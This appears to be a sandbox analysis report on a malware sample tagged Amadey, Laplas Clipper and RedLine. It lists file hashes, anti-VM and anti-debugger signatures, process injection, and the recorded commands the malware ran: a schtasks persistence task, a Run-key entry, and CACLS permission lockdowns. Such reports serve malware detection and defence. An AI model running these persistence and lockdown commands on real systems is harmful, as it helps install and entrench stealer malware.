MD5 952626c44992eb05c992a211e4ca6cc0
SHA1 66bc05850f633d11ef1cc9f071ce79a99f4e0284
SHA256 5724ec4bf056aae4ad2221a8777f65dd0887c05f5a62e292788b657159508d0a
SHA512 32453a1233427be0fa05b7cbf6645893839458809345dc49e374ee722f1d74d30e99af30ab88363acb74bcefe5c624c69098dfc1c5b9afaef54ad4b9dc7235fa

memory/2124-147-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2124-148-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/1868-152-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/1868-155-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/1868-185-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/2664-189-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2664-192-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2664-222-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/896-226-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/896-229-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/896-259-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

memory/2124-273-0x0000000004510000-0x0000000004D7C000-memory.dmp

memory/2172-274-0x0000000000170000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2172-284-0x0000000077B60000-0x0000000077D09000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2124-289-0x0000000004620000-0x000000000555D000-memory.dmp

memory/2992-291-0x000000013FDD0000-0x0000000140D0D000-memory.dmp

memory/2124-294-0x0000000004510000-0x0000000004D7C000-memory.dmp

memory/2992-295-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2172-306-0x0000000000170000-0x00000000009DC000-memory.dmp

memory/2172-307-0x0000000000170000-0x00000000009DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

MD5 9b79f724b8ed77f9e3ce6a71b4cf909d
SHA1 455751b77ffb738d260c6388f191aa590c40eb50
SHA256 b95ae0c815dc8fc44d8c8bbde1e853b96c3e1389fb30bcdf1d68f8e6a74b3106
SHA512 0feb6c94b6c8fbceb8e63b0629e33d72c6080003203080b7d376a0bdf3f1a3a170bd19e1ce81ba284ea15d96414f57031361ac3dbbadf3c13090d86798906fad

memory/2172-312-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2124-313-0x0000000004620000-0x000000000555D000-memory.dmp

memory/2992-314-0x000000013FDD0000-0x0000000140D0D000-memory.dmp

memory/2992-316-0x0000000077B60000-0x0000000077D09000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 66dfc08fcb1e2503a5c51bdfb4ea275c
SHA1 a9e5db42a5493f8564c95bd216ea65b612533ade
SHA256 b838e571004ec023a187ad7dc93e812cea0cdd71e37007cf6dea3d9fddb0f766
SHA512 62d08602e22b9927c86cc3120fc7a381286ac3072d60b927b50341cea0300d19932266a54ca35819ad386028240a09271b27388d4fc0adabdf4047d2fa247636

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 94ecb633f5b61ff494e3d6f555bcab67
SHA1 299d1c33b6446be7007e3616910ae4ae0ffc0802
SHA256 c5239950dddab2e137bcaf55938f77927dec5b84d74ac5d3ebe47f63f23c1168
SHA512 6a6b843d340694050131f8147d7ad278197f4ec37ccf881625c184596fe5d8a88080d63d5aa1ae1f925ec9dc970373b4a2f1565b5f9c992d6b883805ef0341de

memory/2172-324-0x0000000000170000-0x00000000009DC000-memory.dmp

memory/2172-323-0x0000000000170000-0x00000000009DC000-memory.dmp

memory/2172-326-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2172-325-0x0000000028790000-0x0000000028FFC000-memory.dmp

memory/2956-327-0x00000000011A0000-0x0000000001A0C000-memory.dmp

memory/2956-328-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2956-338-0x00000000011A0000-0x0000000001A0C000-memory.dmp

memory/2976-344-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/2976-345-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

memory/2976-346-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2976-347-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

memory/2956-350-0x00000000011A0000-0x0000000001A0C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

memory/2976-351-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

memory/2976-352-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/2976-353-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/2976-354-0x00000000027B0000-0x0000000002830000-memory.dmp

memory/2976-355-0x000007FEF5500000-0x000007FEF5E9D000-memory.dmp

memory/2956-356-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2956-357-0x00000000011A0000-0x0000000001A0C000-memory.dmp

memory/2296-365-0x0000000000C10000-0x00000000013B9000-memory.dmp

memory/2296-362-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 36e1616ef6e5d51bb7a5af664d00d858
SHA1 56162501e6935e82c10b00f523b345c172f19f7c
SHA256 953011052287542fccbaa230a88321161d11dac2c736565d105059c5f83a0efd
SHA512 fc454a3636ae9a6ca9b7c4921ef62846fddb99cd92bd064fb1bf4c55725844765bf9bdf2fd11c04b4114423b2bcfc953362aed2477484eca8a3b4c40e36cc8da

memory/2660-401-0x000000001B1B0000-0x000000001B492000-memory.dmp

memory/2660-402-0x00000000022D0000-0x00000000022D8000-memory.dmp

memory/2660-404-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2660-403-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

memory/2296-400-0x0000000000C10000-0x00000000013B9000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N6V6MSRQK8JQQ0XKMP73.temp

MD5 36e1616ef6e5d51bb7a5af664d00d858
SHA1 56162501e6935e82c10b00f523b345c172f19f7c
SHA256 953011052287542fccbaa230a88321161d11dac2c736565d105059c5f83a0efd
SHA512 fc454a3636ae9a6ca9b7c4921ef62846fddb99cd92bd064fb1bf4c55725844765bf9bdf2fd11c04b4114423b2bcfc953362aed2477484eca8a3b4c40e36cc8da

memory/2660-405-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

memory/2660-406-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2660-407-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/2660-408-0x000007FEF4B60000-0x000007FEF54FD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2992-412-0x0000000077B60000-0x0000000077D09000-memory.dmp

memory/2992-413-0x000000013FDD0000-0x0000000140D0D000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/2036-416-0x000000013F3B0000-0x00000001402ED000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

memory/436-419-0x0000000077B60000-0x0000000077D09000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Program Files\Google\Chrome\updater.exe

MD5 923c6fc5c9308f77104baa7fe9a20ab9
SHA1 b4f77042dfc217ad608ebc2ba858b848c90e11cd
SHA256 6d760f4dcba7c4b6242c3edfb6250d56ca62412dc73c34d1c849a28781c1e2d3
SHA512 b0f8d494c0108a2ce753619715e51fc4aba0ef5f70db21420b9c1cf7209dccafc3dfebb538c6314e54ffb8a3555822c55e7f57ecf33ec5838258f4eaa267defd

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 ede69e83b96e9bd7bbb4f4decd11e817
SHA1 1209597f9e6060b52a6e06ee95eec1c57257eeca
SHA256 1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff
SHA512 8338b9240416577681baf3c49d7e9bfc27bd4a4b62f58b3142c032e0dcf7876a77769b946a88f45e55f6e5ac0bb7e29c66d9f812bec175baf65284457acda696

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-26 04:47

Reported

2023-07-26 04:52

Platform

win10-20230703-en

Max time kernel

235s

Max time network

289s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1100 created 3320 N/A C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe C:\Windows\Explorer.EXE

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Downloads MZ/PE file

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4175128012-676912335-1083716439-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4540 set thread context of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4048 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 4048 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 4048 wrote to memory of 4848 N/A C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 4848 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4848 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4848 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 4848 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4848 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4848 wrote to memory of 4136 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4052 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 3628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4136 wrote to memory of 324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 324 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4136 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4848 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe
PID 4848 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe
PID 4848 wrote to memory of 4540 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe
PID 4848 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 4848 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe
PID 4848 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 4848 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4540 wrote to memory of 5028 N/A C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4172 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe
PID 4172 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe

"C:\Users\Admin\AppData\Local\Temp\1002194039d4892278451b8fce5e33b9db9da5dd07e9811010417f10fa2f86ff.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe

"C:\Users\Admin\AppData\Local\Temp\1000123001\taskmask.exe"

C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe

"C:\Users\Admin\AppData\Local\Temp\1000125001\taskhostclp.exe"

C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe

"C:\Users\Admin\AppData\Local\Temp\1000126101\rdpcllp.exe"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

